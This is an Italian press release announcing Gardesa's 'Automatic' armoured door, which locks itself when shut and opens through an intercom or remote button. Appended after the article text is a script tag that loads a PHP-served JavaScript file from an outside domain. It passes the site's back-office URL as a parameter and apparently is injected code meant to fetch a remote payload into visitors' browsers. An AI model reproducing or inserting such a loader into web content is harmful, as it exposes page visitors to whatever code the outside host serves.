Gardesa, leader mondiale nella progettazione e produzione di porte blindate automatiche per la protezione di abitazioni, uffici, luoghi pubblici, lancia sul mercato la sua nuova proposta: il sistema Automatic.
Automatic è un sistema completamente automatizzato che semplifica la gestione della sicurezza e della protezione delle case e degli uffici. Pratico, affidabile e sicuro, infatti, il dispositivo fa sì che la porta blindata Gardesa si posizioni in sicurezza da sola azionando meccanicamente i sistemi di chiusura, senza che si renda necessario un intervento manuale.
Una funzione automatica aziona, appunto, le mandate in apertura grazie al collegamento al citofono o a un pulsante remoto. Le mandate in chiusura, invece, vengono azionate automaticamente ogni volta che si chiude la porta: questa funzione garantisce i livelli di sicurezza antieffrazione della porta blindata.
Il sistema Automatic consente di vivere nella massima sicurezza senza pensieri perché unisce alla garanzia e all’inviolabilità della porta blindata, la certezza di una chiusura automatica. Automatic è, quindi, la garanzia di un ingresso inviolabile.
Tra le particolarità tecniche del prodotto spicca una serratura a cilindro europeo correlata di defender di protezione sul lato esterno, perfettamente in grado di azionare sul lato interno chiavistelli e pomolo senza l'ausilio della chiave. Le chiavi sono, inoltre, consegnate in confezione sigillata: una garanzia aggiuntiva per la sicurezza di abitazioni e uffici!
<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2013-10-10&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.3515226756017148" type="text/javascript"></script>